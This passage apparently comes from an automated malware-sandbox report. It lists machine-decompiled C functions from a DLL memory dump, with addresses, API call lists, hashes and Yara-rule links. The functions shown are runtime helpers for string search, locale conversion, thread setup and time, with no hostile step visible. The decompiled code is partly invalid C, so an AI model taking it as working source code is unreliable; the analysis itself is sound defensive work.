                                                                                                                                                      • Instruction Fuzzy Hash: 9A21E875A10208ABEB00DFD4D899FEEB7B8EF08704F108608E505BB290D775A685CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019330, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E10019330(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t21;
				void* _t25;
				void* _t30;
				void* _t38;
				void* _t42;
				void* _t44;
				void* _t46;

				_t38 = __edi;
				_t30 = __ebx;
				_t17 = E1000CAC0(_a4);
				_t18 = E1000CAC0(_a8);
				_t44 = _t42 + 8;
				if(_t17 >= _t18) {
					_v8 = _a4;
					_v12 = 0;
					while(1) {
						_t19 = E1000CAC0(_a8);
						_t21 = E1000CAC0(_a4);
						_t46 = _t44 + 8;
						if(_t19 + _v12 > _t21) {
							break;
						}
						_t25 = E1000E89F(_t30, _a8, _t38, _v8, _a8, E1000CAC0(_a8));
						_t44 = _t46 + 0x10;
						if(_t25 != 0) {
							_v12 = _v12 + 1;
							_v8 = _v8 + 1;
							continue;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}















                                                                                                                                                      0x10019330
                                                                                                                                                      0x10019330
                                                                                                                                                      0x1001933b
                                                                                                                                                      0x10019349
                                                                                                                                                      0x1001934e
                                                                                                                                                      0x10019353
                                                                                                                                                      0x1001935e
                                                                                                                                                      0x10019361
                                                                                                                                                      0x1001937c
                                                                                                                                                      0x10019380
                                                                                                                                                      0x10019391
                                                                                                                                                      0x10019396
                                                                                                                                                      0x1001939b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100193b2
                                                                                                                                                      0x100193b7
                                                                                                                                                      0x100193bc
                                                                                                                                                      0x10019370
                                                                                                                                                      0x10019379
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019379
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100193be
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100193c7
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4218353326-0
                                                                                                                                                      • Opcode ID: 2e95c50b6762c7a11e15052646cc8f45d1bd71e23564d2a17366cbdfb9a5a65b
                                                                                                                                                      • Instruction ID: fd93541d7ed1397f6a851c7bfd43323bc4bd1343b06978e00cafc39966250b4e
                                                                                                                                                      • Opcode Fuzzy Hash: 2e95c50b6762c7a11e15052646cc8f45d1bd71e23564d2a17366cbdfb9a5a65b
                                                                                                                                                      • Instruction Fuzzy Hash: 571177BAE0420CE7DB10DFA8D88199E77A8DB04298F148565FD19EB345F531FF808792
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100196D0, Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E100196D0(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t24;
				void* _t27;
				void* _t28;
				void* _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t36 = __edi;
				_t28 = __ebx;
				_v8 = 0;
				if(_a4 != 0 && _a8 != 0) {
					_t20 = E1000CAC0(_a4);
					_t21 = E1000CAC0(_a8);
					_t42 = _t40 + 8;
					if(_t20 >= _t21) {
						_v12 = 0;
						while(1) {
							_t23 = E1000CAC0(_a4);
							_t24 = E1000CAC0(_a8);
							_t44 = _t42 + 8;
							if(_v12 >= _t23 - _t24) {
								goto L9;
							}
							_t27 = E1000E89F(_t28, _a8, _t36, _a4 + _v12, _a8, E1000CAC0(_a8));
							_t42 = _t44 + 0x10;
							if(_t27 != 0) {
								_v12 = _v12 + 1;
								continue;
							} else {
								_v8 = 1;
							}
							goto L9;
						}
					}
				}
				L9:
				return _v8;
			}















                                                                                                                                                      0x100196d0
                                                                                                                                                      0x100196d0
                                                                                                                                                      0x100196d7
                                                                                                                                                      0x100196e2
                                                                                                                                                      0x100196f6
                                                                                                                                                      0x10019704
                                                                                                                                                      0x10019709
                                                                                                                                                      0x1001970e
                                                                                                                                                      0x10019710
                                                                                                                                                      0x10019722
                                                                                                                                                      0x10019726
                                                                                                                                                      0x10019734
                                                                                                                                                      0x10019739
                                                                                                                                                      0x10019741
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001975b
                                                                                                                                                      0x10019760
                                                                                                                                                      0x10019765
                                                                                                                                                      0x1001971f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019767
                                                                                                                                                      0x10019767
                                                                                                                                                      0x10019767
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019765
                                                                                                                                                      0x10019722
                                                                                                                                                      0x1001970e
                                                                                                                                                      0x10019772
                                                                                                                                                      0x10019779

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4218353326-0
                                                                                                                                                      • Opcode ID: 8611dd32ed2c8444fb0f5c1ea4afab806a2b034aeaa9f588fce8cf00fcbf311d
                                                                                                                                                      • Instruction ID: 7552c70825ce5aa6cbe61f7ae5d70de39af72cecddf3b8ac3a80b57e73ca6885
                                                                                                                                                      • Opcode Fuzzy Hash: 8611dd32ed2c8444fb0f5c1ea4afab806a2b034aeaa9f588fce8cf00fcbf311d
                                                                                                                                                      • Instruction Fuzzy Hash: 4311ABBAD1420CEBDB14CFA4D485B9D77A4EF0428CF048165FC0A9B245E635EB84CB82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000EA65, Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 67%
                                                                                                                                                      			E1000EA65(void* __ebx, void* __edi) {

				E100130A0();
				if(E100148B1(1, 0x214) != __edi) {
					_push(__esi);
					_push( *0x10332c68);
					__eax = E10013034( *0x10333820);
					__eflags = __eax;
					if(__eflags == 0) {
						_push(__esi);
						__eax = E1000CA30(__ebx, __edi, __esi, __eflags);
						goto L1;
					} else {
						_push(__edi);
						_push(__esi);
						__eax = E10013107(__ebx, __edi, __esi, __eflags);
						__eax = GetCurrentThreadId();
						__esi[1] = __esi[1] | 0xffffffff;
						 *__esi = __eax;
						0 = 1;
						__eflags = 1;
					}
				}
				return 0;
			}



                                                                                                                                                      0x1000ea65
                                                                                                                                                      0x1000ea7c
                                                                                                                                                      0x1000ea82
                                                                                                                                                      0x1000ea83
                                                                                                                                                      0x1000ea8f
                                                                                                                                                      0x1000ea97
                                                                                                                                                      0x1000ea99
                                                                                                                                                      0x1000eab2
                                                                                                                                                      0x1000eab3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ea9b
                                                                                                                                                      0x1000ea9b
                                                                                                                                                      0x1000ea9c
                                                                                                                                                      0x1000ea9d
                                                                                                                                                      0x1000eaa4
                                                                                                                                                      0x1000eaaa
                                                                                                                                                      0x1000eaae
                                                                                                                                                      0x1000eacc
                                                                                                                                                      0x1000eacc
                                                                                                                                                      0x1000eacc
                                                                                                                                                      0x1000ea99
                                                                                                                                                      0x1000ead1

                                                                                                                                                      APIs
                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 1000EA65
                                                                                                                                                        • Part of subcall function 100130A0: TlsGetValue.KERNEL32(100131CA), ref: 100130A6
                                                                                                                                                        • Part of subcall function 100130A0: __decode_pointer.LIBCMT ref: 100130B6
                                                                                                                                                        • Part of subcall function 100130A0: TlsSetValue.KERNEL32(00000000), ref: 100130C3
                                                                                                                                                      • __calloc_crt.LIBCMT ref: 1000EA71
                                                                                                                                                        • Part of subcall function 100148B1: __calloc_impl.LIBCMT ref: 100148BF
                                                                                                                                                        • Part of subcall function 100148B1: Sleep.KERNEL32(00000000,100131F0,00000001,00000214), ref: 100148D6
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 1000EA8F
                                                                                                                                                        • Part of subcall function 10013034: TlsGetValue.KERNEL32(?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330240), ref: 10013041
                                                                                                                                                        • Part of subcall function 10013034: TlsGetValue.KERNEL32(00000005,?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001), ref: 10013058
                                                                                                                                                      • __initptd.LIBCMT ref: 1000EA9D
                                                                                                                                                        • Part of subcall function 10013107: GetModuleHandleA.KERNEL32(KERNEL32.DLL,10330340,0000000C,10013219,00000000,00000000), ref: 10013118
                                                                                                                                                        • Part of subcall function 10013107: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10013141
                                                                                                                                                        • Part of subcall function 10013107: GetProcAddress.KERNEL32(?,DecodePointer), ref: 10013151
                                                                                                                                                        • Part of subcall function 10013107: InterlockedIncrement.KERNEL32(10332650), ref: 10013173
                                                                                                                                                        • Part of subcall function 10013107: ___addlocaleref.LIBCMT ref: 1001319A
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1000EAA4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$AddressProc__decode_pointer$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref___set_flsgetvalue__calloc_crt__calloc_impl__initptd
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1662683381-0
                                                                                                                                                      • Opcode ID: 4523e30f6971cb40a2426855bbae9302a8168ff4489a0cf2ac2da806801fc158
                                                                                                                                                      • Instruction ID: d37afd26d2eadf3ef50fe9e24c1f066afac95630afcebaca695182ecfc570b21
                                                                                                                                                      • Opcode Fuzzy Hash: 4523e30f6971cb40a2426855bbae9302a8168ff4489a0cf2ac2da806801fc158
                                                                                                                                                      • Instruction Fuzzy Hash: 62F027373042A1ADF235F774AC4294E37C4EB8A3F1730892AF552EC0E5EE21E8808261
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A740, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                      			E1001A740(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				char _v279;
				char _v280;
				intOrPtr _v284;
				char _v312;
				signed int _v316;
				void* __ebp;
				void* _t27;
				intOrPtr _t52;
				void* _t55;

				_t51 = __esi;
				_t50 = __edi;
				_t37 = __ebx;
				_push(0xffffffff);
				_push(E10022AB3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_v316 = 0;
				E10001160( &_v312, __eflags, 0x10024c8f);
				_v8 = 0;
				_v280 = 0;
				E1000CF20(__edi,  &_v279, 0, 0x103);
				E1001DC00(__ebx, _t50, __esi,  &_v280);
				_t46 =  &_v280;
				_t27 = E1000CAC0( &_v280);
				_t55 = _t52 - 0x12c + 0x10;
				_t59 = _t27;
				if(_t27 == 0) {
					E1000D8A3( &_v280,  &_v280, 0x104, "unknown err");
					_t55 = _t55 + 0xc;
				}
				_v284 = E1001A480(_t37, _t46, _t50, _t51, _t59,  &_v280);
				E100011C0( &_v312, _v284);
				_push(_v284);
				E1000CA30(_t37, _t50, _t51, _t59);
				E10001110(_a4, _t59,  &_v312);
				_v316 = _v316 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v312);
				 *[fs:0x0] = _v16;
				return _a4;
			}














                                                                                                                                                      0x1001a740
                                                                                                                                                      0x1001a740
                                                                                                                                                      0x1001a740
                                                                                                                                                      0x1001a743
                                                                                                                                                      0x1001a745
                                                                                                                                                      0x1001a750
                                                                                                                                                      0x1001a751
                                                                                                                                                      0x1001a75e
                                                                                                                                                      0x1001a773
                                                                                                                                                      0x1001a778
                                                                                                                                                      0x1001a77f
                                                                                                                                                      0x1001a794
                                                                                                                                                      0x1001a7a3
                                                                                                                                                      0x1001a7a8
                                                                                                                                                      0x1001a7af
                                                                                                                                                      0x1001a7b4
                                                                                                                                                      0x1001a7b7
                                                                                                                                                      0x1001a7b9
                                                                                                                                                      0x1001a7cc
                                                                                                                                                      0x1001a7d1
                                                                                                                                                      0x1001a7d1
                                                                                                                                                      0x1001a7e3
                                                                                                                                                      0x1001a7f6
                                                                                                                                                      0x1001a801
                                                                                                                                                      0x1001a802
                                                                                                                                                      0x1001a814
                                                                                                                                                      0x1001a822
                                                                                                                                                      0x1001a828
                                                                                                                                                      0x1001a835
                                                                                                                                                      0x1001a840
                                                                                                                                                      0x1001a84a

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001A794
                                                                                                                                                        • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC28
                                                                                                                                                        • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC45
                                                                                                                                                        • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC5B
                                                                                                                                                        • Part of subcall function 1001DC00: GetVersionExW.KERNEL32(00000114), ref: 1001DC74
                                                                                                                                                        • Part of subcall function 1001DC00: _strcpy_s.LIBCMT ref: 1001DDA9
                                                                                                                                                      • _strlen.LIBCMT ref: 1001A7AF
                                                                                                                                                      • _strcpy_s.LIBCMT ref: 1001A7CC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_strcpy_s$Version_strlen
                                                                                                                                                      • String ID: unknown err
                                                                                                                                                      • API String ID: 3541540748-813478822
                                                                                                                                                      • Opcode ID: dd71c00dc3e889e3b8e1fcdb10f070c2db9be79ce23929b4c0d2ec3d363c14be
                                                                                                                                                      • Instruction ID: 908e89cf5b9352ff889f1a9c3fa8eeef98413c65ec874cc1b061f0950b8e6722
                                                                                                                                                      • Opcode Fuzzy Hash: dd71c00dc3e889e3b8e1fcdb10f070c2db9be79ce23929b4c0d2ec3d363c14be
                                                                                                                                                      • Instruction Fuzzy Hash: 6F214FB5C0021CABDB28DB54DD82BD9B774EB04754F4041D4B609A7285EB74BB84CFD2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001815A, Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001815A(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E1000D4F5( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E10013A1A( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E1000F720(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                                                      0x10018162
                                                                                                                                                      0x10018169
                                                                                                                                                      0x1001817e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10018170
                                                                                                                                                      0x10018172
                                                                                                                                                      0x1001818a
                                                                                                                                                      0x1001818f
                                                                                                                                                      0x10018192
                                                                                                                                                      0x10018195
                                                                                                                                                      0x100181be
                                                                                                                                                      0x100181c3
                                                                                                                                                      0x100181c7
                                                                                                                                                      0x10018248
                                                                                                                                                      0x1001825a
                                                                                                                                                      0x10018263
                                                                                                                                                      0x10018265
                                                                                                                                                      0x100181a5
                                                                                                                                                      0x100181a5
                                                                                                                                                      0x100181a8
                                                                                                                                                      0x100181aa
                                                                                                                                                      0x100181ad
                                                                                                                                                      0x100181ad
                                                                                                                                                      0x100181ad
                                                                                                                                                      0x100181ad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100181b3
                                                                                                                                                      0x10018227
                                                                                                                                                      0x10018227
                                                                                                                                                      0x1001822c
                                                                                                                                                      0x10018232
                                                                                                                                                      0x10018235
                                                                                                                                                      0x10018237
                                                                                                                                                      0x1001823a
                                                                                                                                                      0x1001823a
                                                                                                                                                      0x1001823a
                                                                                                                                                      0x1001823a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001823e
                                                                                                                                                      0x100181c9
                                                                                                                                                      0x100181cc
                                                                                                                                                      0x100181cc
                                                                                                                                                      0x100181d2
                                                                                                                                                      0x100181d5
                                                                                                                                                      0x100181fc
                                                                                                                                                      0x100181ff
                                                                                                                                                      0x100181ff
                                                                                                                                                      0x10018205
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10018207
                                                                                                                                                      0x1001820a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001820c
                                                                                                                                                      0x1001820c
                                                                                                                                                      0x1001820f
                                                                                                                                                      0x1001820f
                                                                                                                                                      0x10018215
                                                                                                                                                      0x10018183
                                                                                                                                                      0x10018183
                                                                                                                                                      0x1001821e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001821e
                                                                                                                                                      0x100181d7
                                                                                                                                                      0x100181da
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100181de
                                                                                                                                                      0x100181ec
                                                                                                                                                      0x100181ef
                                                                                                                                                      0x100181f5
                                                                                                                                                      0x100181f7
                                                                                                                                                      0x100181fa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100181fa
                                                                                                                                                      0x10018197
                                                                                                                                                      0x1001819a
                                                                                                                                                      0x1001819c
                                                                                                                                                      0x100181a2
                                                                                                                                                      0x100181a2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10018174
                                                                                                                                                      0x10018174
                                                                                                                                                      0x10018179
                                                                                                                                                      0x1001817b
                                                                                                                                                      0x1001817b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10018179
                                                                                                                                                      0x10018172

                                                                                                                                                      APIs
                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1001818A
                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 100181BE
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,10016B7E,?,?,00000002), ref: 100181EF
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,10016B7E,?,?,00000002), ref: 1001825D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                      • Opcode ID: 5e8ca58f192645aeac23bdabe86f34e73e76cd9a67157fe0bad94941ff89931c
                                                                                                                                                      • Instruction ID: 8c2b7c8d3196bbd4c2d7993dcbbe5c0e1781117acee873ad45468beb87eff19f
                                                                                                                                                      • Opcode Fuzzy Hash: 5e8ca58f192645aeac23bdabe86f34e73e76cd9a67157fe0bad94941ff89931c
                                                                                                                                                      • Instruction Fuzzy Hash: 37318D32A04296FFEB11CFA4CC819AE7BE9FF02251F1585A9E4509F1A1D730DB81DB51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A370, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A370(void* __ebx, void* __edi, void* __esi, char* _a4) {
				int _v8;
				int _v12;
				short* _v16;

				_v16 = 0;
				_v12 = E1000CAC0(_a4);
				_v8 = MultiByteToWideChar(0, 0, _a4, _v12, 0, 0);
				_t9 = _v8 + 2; // 0x2
				_v16 = L1000CE56(__ebx, _a4, __edi, __esi, _v8 + _t9);
				_t13 = _v8 + 2; // 0x2
				E1000CF20(__edi, _v16, 0, _v8 + _t13);
				MultiByteToWideChar(0, 0, _a4, _v12, _v16, _v8);
				_v16[_v8] = 0;
				return _v16;
			}






                                                                                                                                                      0x1001a376
                                                                                                                                                      0x1001a389
                                                                                                                                                      0x1001a3a2
                                                                                                                                                      0x1001a3a8
                                                                                                                                                      0x1001a3b5
                                                                                                                                                      0x1001a3bb
                                                                                                                                                      0x1001a3c6
                                                                                                                                                      0x1001a3e2
                                                                                                                                                      0x1001a3ee
                                                                                                                                                      0x1001a3fa

                                                                                                                                                      APIs
                                                                                                                                                      • _strlen.LIBCMT ref: 1001A381
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A39C
                                                                                                                                                      • _memset.LIBCMT ref: 1001A3C6
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3E2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide$_memset_strlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 745779501-0
                                                                                                                                                      • Opcode ID: bebd11029f934ca765ae3ad1a928e3e554420f3dbb80f1cb6d9ef85ef79db074
                                                                                                                                                      • Instruction ID: c5e182b0f3cbb216502a88be2155e7732263ea6a521cd02f1448982d76bc71fb
                                                                                                                                                      • Opcode Fuzzy Hash: bebd11029f934ca765ae3ad1a928e3e554420f3dbb80f1cb6d9ef85ef79db074
                                                                                                                                                      • Instruction Fuzzy Hash: 5311B1B9E00208FBEB14CF94D895F9EB7B5EB48704F108198F9099B385D671AA018B95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001F570, Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E1001F570() {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				struct _SYSTEMTIME _v52;
				struct _FILETIME _v60;
				intOrPtr _t31;

				_v28.wYear = 0x7b2;
				_v28.wMonth = 1;
				_v28.wDay = 1;
				_v28.wHour = 0;
				_v28.wMinute = 0;
				_v28.wSecond = 0;
				_v28.wMilliseconds = 0;
				GetSystemTime( &_v52);
				SystemTimeToFileTime( &_v52,  &_v12);
				SystemTimeToFileTime( &_v28,  &_v60);
				_t31 = _v12.dwLowDateTime - _v60.dwLowDateTime;
				asm("sbb eax, [ebp-0x34]");
				_v36 = E1000F290(_t31, _v12.dwHighDateTime, 0x2710, 0);
				_v32 = _t31;
				return _v36;
			}










                                                                                                                                                      0x1001f576
                                                                                                                                                      0x1001f57c
                                                                                                                                                      0x1001f582
                                                                                                                                                      0x1001f588
                                                                                                                                                      0x1001f58e
                                                                                                                                                      0x1001f594
                                                                                                                                                      0x1001f59a
                                                                                                                                                      0x1001f5a4
                                                                                                                                                      0x1001f5b2
                                                                                                                                                      0x1001f5c0
                                                                                                                                                      0x1001f5c9
                                                                                                                                                      0x1001f5cf
                                                                                                                                                      0x1001f5e0
                                                                                                                                                      0x1001f5e3
